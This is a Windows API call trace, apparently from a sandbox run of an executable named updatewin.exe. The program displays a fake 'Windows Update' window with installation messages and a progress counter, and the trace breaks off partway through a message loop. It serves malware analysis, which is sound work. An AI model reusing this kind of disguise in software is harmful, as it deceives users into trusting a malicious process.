!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18d928, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0083.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18e1dc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8b\x08é¯\x18å\x18", lpUsedDefaultChar=0x0) returned 256 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x80) returned 0x62b0e0 [0083.110] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x413ba8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe")) returned 0x5e [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xc6) returned 0x62d360 [0083.110] RtlInitializeSListHead (in: ListHead=0x413ad0 | out: ListHead=0x413ad0) [0083.110] GetLastError () returned 0x0 [0083.110] GetEnvironmentStringsW () returned 0x62d430* [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xaca) returned 0x62df08 [0083.110] FreeEnvironmentStringsW (penv=0x62d430) returned 1 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x98) returned 0x62afc8 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3e) returned 0x62d430 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x6c) returned 0x62d478 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x6e) returned 0x62d4f0 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x78) returned 0x611270 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x62) returned 0x62d568 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2e) returned 0x6152c0 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x48) returned 0x62d5d8 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28) returned 0x62d628 [0083.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a) returned 0x62d0a8 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x4a) returned 0x62d658 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x72) returned 0x6112f0 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x30) returned 0x6152f8 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2e) returned 0x615330 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1c) returned 0x62d0d0 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xd2) returned 0x62d6b0 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x7c) returned 0x62d790 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x36) returned 0x62d818 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3a) returned 0x62e9f8 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x90) returned 0x62d858 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x24) returned 0x62d8f0 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x30) returned 0x615368 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x36) returned 0x62d920 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x48) returned 0x62d960 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x52) returned 0x62d9b0 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c) returned 0x62ea40 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x82) returned 0x62da10 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2e) returned 0x6153a0 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1e) returned 0x62d0f8 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2c) returned 0x6153d8 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x54) returned 0x62daa0 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x52) returned 0x62db00 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2a) returned 0x615410 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c) returned 0x62ea88 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x54) returned 0x62db60 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x24) returned 0x62dbc0 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x30) returned 0x615448 [0083.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x8c) returned 0x62dbf0 [0083.112] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x62df08 | out: hHeap=0x600000) returned 1 [0083.112] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x800) returned 0x62dc88 [0083.113] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.113] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402116) returned 0x404e69 [0083.219] GetStartupInfoW (in: lpStartupInfo=0x18e548 | out: lpStartupInfo=0x18e548*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0083.219] InitCommonControlsEx (picce=0x18e564) returned 1 [0083.219] LoadIconW (hInstance=0x400000, lpIconName=0x6b) returned 0xe0243 [0083.221] LoadStringW (in: hInstance=0x400000, uID=0x67, lpBuffer=0x414378, cchBufferMax=100 | out: lpBuffer="Windows Update") returned 0xe [0083.221] LoadStringW (in: hInstance=0x400000, uID=0x6d, lpBuffer=0x4142b0, cchBufferMax=100 | out: lpBuffer="WINDOWSUPDATE") returned 0xd [0083.222] LoadIconW (hInstance=0x400000, lpIconName=0x6b) returned 0xe0243 [0083.222] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0083.222] LoadIconW (hInstance=0x400000, lpIconName=0x6c) returned 0x690061 [0083.222] RegisterClassExW (param_1=0x18e510) returned 0xc13f [0083.222] GetDesktopWindow () returned 0x10010 [0083.222] MonitorFromWindow (hwnd=0x10010, dwFlags=0x2) returned 0x10001 [0083.223] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x18e510 | out: lpmi=0x18e510) returned 1 [0083.223] CreateWindowExW (dwExStyle=0x0, lpClassName="WINDOWSUPDATE", lpWindowName="Windows Update", dwStyle=0x0, X=1002, Y=600, nWidth=418, nHeight=240, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xb0270 [0083.363] NtdllDefWindowProc_W () returned 0x0 [0083.364] NtdllDefWindowProc_W () returned 0x1 [0083.367] NtdllDefWindowProc_W () returned 0x0 [0083.371] CreateDialogParamW (hInstance=0x400000, lpTemplateName=0x65, hWndParent=0xb0270, lpDialogFunc=0x401360, dwInitParam=0x0) returned 0x50018 [0083.382] NtdllDefWindowProc_W () returned 0x0 [0083.386] NtdllDefWindowProc_W () returned 0x0 [0083.386] NtdllDefWindowProc_W () returned 0x0 [0083.393] GetClientRect (in: hWnd=0x50018, lpRect=0x18d358 | out: lpRect=0x18d358) returned 1 [0083.393] GetDlgItem (hDlg=0x50018, nIDDlgItem=1000) returned 0x50016 [0083.394] MoveWindow (hWnd=0x50016, X=295, Y=167, nWidth=95, nHeight=23, bRepaint=1) returned 1 [0083.396] GetDlgItem (hDlg=0x50018, nIDDlgItem=1001) returned 0x601c4 [0083.396] MoveWindow (hWnd=0x601c4, X=95, Y=134, nWidth=225, nHeight=16, bRepaint=1) returned 1 [0083.397] SendMessageW (hWnd=0x601c4, Msg=0x401, wParam=0x0, lParam=0x640000) returned 0x640000 [0083.398] SendMessageW (hWnd=0x601c4, Msg=0x402, wParam=0x4, lParam=0x0) returned 0x0 [0083.409] timeGetTime () returned 0x115aa05 [0083.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x401690, lpParameter=0x50018, dwCreationFlags=0x0, lpThreadId=0x4142a4 | out: lpThreadId=0x4142a4*=0x898) returned 0xbc [0083.411] ShowWindow (hWnd=0x50018, nCmdShow=5) returned 0 [0083.411] GetClientRect (in: hWnd=0xb0270, lpRect=0x18df10 | out: lpRect=0x18df10) returned 1 [0083.411] MoveWindow (hWnd=0x50018, X=0, Y=0, nWidth=412, nHeight=212, bRepaint=1) returned 1 [0083.413] NtdllDefWindowProc_W () returned 0x0 [0083.413] SetWindowPos (hWnd=0xb0270, hWndInsertAfter=0xffffffff, X=0, Y=0, cx=0, cy=0, uFlags=0x3) returned 1 [0083.413] NtdllDefWindowProc_W () returned 0x0 [0083.418] NtdllDefWindowProc_W () returned 0x0 [0083.418] NtdllDefWindowProc_W () returned 0x0 [0083.549] NtdllDefWindowProc_W () returned 0x0 [0083.550] NtdllDefWindowProc_W () returned 0x0 [0083.550] NtdllDefWindowProc_W () returned 0x1 [0083.552] NtdllDefWindowProc_W () returned 0x0 [0083.582] NtdllDefWindowProc_W () returned 0x0 [0083.584] NtdllDefWindowProc_W () returned 0x0 [0083.584] NtdllDefWindowProc_W () returned 0x0 [0083.584] NtdllDefWindowProc_W () returned 0x0 [0083.585] ShowWindow (hWnd=0xb0270, nCmdShow=1) returned 0 [0083.585] NtdllDefWindowProc_W () returned 0x0 [0083.585] NtdllDefWindowProc_W () returned 0x0 [0083.585] NtdllDefWindowProc_W () returned 0x0 [0083.590] NtdllDefWindowProc_W () returned 0x1 [0083.590] NtdllDefWindowProc_W () returned 0x0 [0083.591] NtdllDefWindowProc_W () returned 0x0 [0083.591] NtdllDefWindowProc_W () returned 0x0 [0083.591] UpdateWindow (hWnd=0xb0270) returned 1 [0083.591] BeginPaint (in: hWnd=0xb0270, lpPaint=0x18e328 | out: lpPaint=0x18e328) returned 0x20109d3 [0083.591] EndPaint (hWnd=0xb0270, lpPaint=0x18e328) returned 1 [0083.591] BeginPaint (in: hWnd=0x50018, lpPaint=0x18da10 | out: lpPaint=0x18da10) returned 0x901087f [0083.592] CreateSolidBrush (color=0x5b3ef) returned 0x161009d0 [0083.592] FillRect (hDC=0x901087f, lprc=0x18da00, hbr=0x161009d0) returned 1 [0083.593] DeleteObject (ho=0x161009d0) returned 1 [0083.593] DrawIcon (hDC=0x901087f, X=7, Y=7, hIcon=0xe0243) returned 1 [0083.594] CreateFontW (cHeight=-19, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x290a0841 [0083.594] SelectObject (hdc=0x901087f, h=0x290a0841) returned 0x18a002e [0083.594] SetBkMode (hdc=0x901087f, mode=1) returned 2 [0083.594] lstrlenW (lpString="Installing important updates Windows.") returned 37 [0083.594] TextOutW (hdc=0x901087f, x=55, y=10, lpString="Installing important updates Windows.", c=37) returned 1 [0083.599] SelectObject (hdc=0x901087f, h=0x18a002e) returned 0x290a0841 [0083.599] CreateSolidBrush (color=0xffffff) returned 0x171009d0 [0083.599] FillRect (hDC=0x901087f, lprc=0x18d9f0, hbr=0x171009d0) returned 1 [0083.599] DeleteObject (ho=0x171009d0) returned 1 [0083.599] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=500, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x80a09cf [0083.604] SelectObject (hdc=0x901087f, h=0x80a09cf) returned 0x18a002e [0083.604] SetBkMode (hdc=0x901087f, mode=1) returned 1 [0083.604] lstrlenW (lpString="Getting your update ready.") returned 26 [0083.605] TextOutW (hdc=0x901087f, x=52, y=60, lpString="Getting your update ready.", c=26) returned 1 [0083.605] lstrlenW (lpString="Configuring update for Windows.") returned 31 [0083.605] TextOutW (hdc=0x901087f, x=52, y=77, lpString="Configuring update for Windows.", c=31) returned 1 [0083.605] lstrlenW (lpString="Don't turn off your computer or close it.") returned 41 [0083.605] TextOutW (hdc=0x901087f, x=52, y=94, lpString="Don't turn off your computer or close it.", c=41) returned 1 [0083.605] SelectObject (hdc=0x901087f, h=0x18a002e) returned 0x80a09cf [0083.605] CreateFontW (cHeight=-15, cWidth=0, cEscapement=0, cOrientation=0, cWeight=700, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x0, iOutPrecision=0x0, iClipPrecision=0x0, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x390a09c4 [0083.608] SelectObject (hdc=0x901087f, h=0x390a09c4) returned 0x18a002e [0083.608] SetBkMode (hdc=0x901087f, mode=1) returned 1 [0083.608] SetTextAlign (hdc=0x901087f, align=0x6) returned 0x0 [0083.608] wsprintfW (in: param_1=0x18da50, param_2="Percent complete: %i%%" | out: param_1="Percent complete: 4%") returned 20 [0083.608] lstrlenW (lpString="Percent complete: 4%") returned 20 [0083.608] TextOutW (hdc=0x901087f, x=209, y=111, lpString="Percent complete: 4%", c=20) returned 1 [0083.616] SelectObject (hdc=0x901087f, h=0x18a002e) returned 0x390a09c4 [0083.616] EndPaint (hWnd=0x50018, lpPaint=0x18da10) returned 1 [0083.642] LoadAcceleratorsW (hInstance=0x400000, lpTableName=0x6d) returned 0xf00ff [0083.642] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.642] TranslateAcceleratorW (hWnd=0x0, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.642] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.642] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.642] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.642] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.642] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.642] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.642] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.642] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.642] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.642] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.643] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.645] NtdllDefWindowProc_W () returned 0x0 [0083.645] NtdllDefWindowProc_W () returned 0x0 [0083.646] NtdllDefWindowProc_W () returned 0x0 [0083.686] TranslateAcceleratorW (hWnd=0x301bc, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.686] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.687] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.687] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.687] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.687] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.687] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.687] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.687] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.687] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.687] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.688] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.733] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.733] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.733] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.733] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.780] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.780] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.780] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.780] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.827] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.827] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.827] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.827] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.827] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.827] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.827] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.828] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.874] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.874] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.874] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.874] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.889] TranslateAcceleratorW (hWnd=0x2026e, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.889] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.889] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.889] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.921] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.921] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.921] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.923] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0083.923] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0083.923] TranslateMessage (lpMsg=0x18e548) returned 0 [0083.923] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0083.946] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.463] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.463] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.463] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.464] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.498] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.498] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.498] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.498] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.498] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.498] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.498] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.499] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.747] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.747] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.747] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.747] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.747] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.747] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.747] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.749] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.794] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.794] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.794] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.794] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.794] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.794] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.794] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.796] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.842] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.842] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.842] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.842] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.842] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.842] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.842] DispatchMessageW (lpMsg=0x18e548) returned 0x0 [0084.843] GetMessageW (in: lpMsg=0x18e548, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e548) returned 1 [0084.888] TranslateAcceleratorW (hWnd=0x601c4, hAccTable=0xf00ff, lpMsg=0x18e548) returned 0 [0084.888] TranslateMessage (lpMsg=0x18e548) returned 0 [0084.888] DispatchMessageW 